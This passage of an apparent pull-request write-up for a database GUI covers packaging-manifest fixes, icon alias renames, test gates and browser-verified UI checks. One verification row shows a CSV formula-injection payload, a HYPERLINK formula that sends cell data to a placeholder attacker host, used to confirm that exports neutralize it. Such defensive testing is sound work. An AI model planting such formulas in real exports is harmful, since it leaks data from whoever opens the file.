foreign-key concept, the capture returned rows, the capture returned zero rows.

### DOC4 - three packaging manifests published "thirteen engines" against fourteen drivers

All four lines now carry no count. Nothing regenerates these templates from the registry, so any
digit is stale the day the next engine lands - that is #445's lesson applied rather than the
digit bumped. Each line was rewritten for its own field (a nuspec description, a Homebrew desc
capped at 80 chars, two winget locale fields) rather than one sentence pasted four times.

`desktop/src-tauri/tauri.conf.json` published the same wrong number and was in the same class
while covered by no entry, so it is fixed here too. `deploy/rancher/CATALOG_LISTING.md` asserted
those files "all still say thirteen", which this change made false; corrected.

`packaging/linux/nfpm.yaml` keeps its count deliberately - it is consumed at release time from
`main`, so it is correct at every tag, and that reasoning is already written down.

### P6 - twenty-one icon names survived only through legacy aliases

lucide-react 1.31.0 ships zero `@deprecated` tags, so nothing warned while an alias was alive
and the first signal would have been a build breaking on the release that drops it.

The map was extracted from the installed package's own `.d.ts` re-export line rather than
guessed. Two things the sweep measured that the entry got wrong:

- The entry claimed `History` has a rendered-output consequence, because `createLucideIcon`
  derives the emitted class from the canonical name. It does - but it already did:
  `SchemaDiff.test.tsx` asserts `lucide-triangle-alert` today while the import site said
  `AlertTriangle`. The alias never reached the class, so this rename changes nothing at runtime.
- `Filter -> Funnel` is not a safe identifier rename. The mechanical pass also rewrote three
  pieces of human-facing text in `ResultsGrid.tsx` - a tooltip titled "Filter column", a
  `Filter ${field}...` placeholder and a comment. Restored; only the icon identifier moved.

Four vendored `src/components/ui/` files take the `Icon`-suffixed spelling
(`LoaderCircleIcon`, `EllipsisIcon`) because that is the convention already sitting next to them:
`sonner.tsx` had `CircleCheckIcon` and `TriangleAlertIcon` beside the one straggler
`Loader2Icon`. The rename moves those files toward upstream shadcn, not away from it.

### D11 - was in the file twice, byte-identical

## Gates

All six locally, on the final tree: `format`, `lint` (0 errors), `typecheck`, `knip`,
`test` (**11785 pass / 0 fail**), `build`. Plus `build:lib` + `attw` because the published
surface changed, and the hard coverage gate: **100.00%, 40934/40934 lines**.

## Verified in Chrome against a production build

Not asserted - driven, on live containers.

| Item | Evidence |
| --- | --- |
| **U13 negative** | On the SQLITE sample the toolbar renders RUN, Save, Format, Copy, Clear, EDIT, IMPORT, Explain and **no** BEGIN/SANDBOX |
| **U13 non-vacuity** | `POST /api/db/transaction {action:"begin"}` with that same SQLite connection answers **HTTP 400** *"Transaction control is not supported for this database type"* - the buttons removed were dead |
| **U13 positive** | On a live PostgreSQL connection the same toolbar renders **BEGIN** and **SANDBOX** |
| **U6** | Postgres: *"Runs REINDEX DATABASE, reconstructing every index in the database."* SQLite: *"Runs bare REINDEX, rebuilding every index in the database file."* Two providers, two strings, where both used to read the same Postgres sentence |
| **U4 positive** | With `/api/db/profile` faulted to 400, the profiler renders the error |
| **U4 exit 1** | An Escape keydown from the focused element closes it |
| **U4 exit 2** | `[aria-label="Close data profiler"]` is on screen at (1154,472) and `elementFromPoint` at its own centre returns the button itself - nothing covers it - and clicking it closes the modal |
| **X1** | Exported CSV: `"'=HYPERLINK(""http://attacker/""&A1)",-12.5,"'+1+2","'@SUM(1)",ordinary` - three neutralized, `-12.5` unquoted and untouched, `ordinary` byte-identical |
| **B44** | A plan run on a `SELECT`-only role over a database with genuinely zero foreign keys (`arun_888499b23fd6468ead121bbc4bcad107`) now answers *"No foreign key relations are declared ... **in the catalog accessible to this connection**"*. The scoping clause is the item |

One tooling note for whoever repeats this: `press_key("Escape")` through the DevTools protocol
delivers **no** keydown to the page - a capture-phase listener at `document` sees an empty array.
The Escape verification above dispatches from `document.activeElement` with `bubbles: true`,
which is the same path a real keypress takes.

## Skipped, with reasons

- **U9** wants a live Oracle run proving the per-table control no longer returns ORA-01418.
  Container cost against this round's pace; the entry now carries the Couchbase finding too.
- **H3** is already parked on "when a real investigation needs it".
- **H7** says in its own text that it is a new capability rather than a gap being closed.
- **D4** and **D10** collide with U13 on `docs/providers/mongodb.md`; next round.
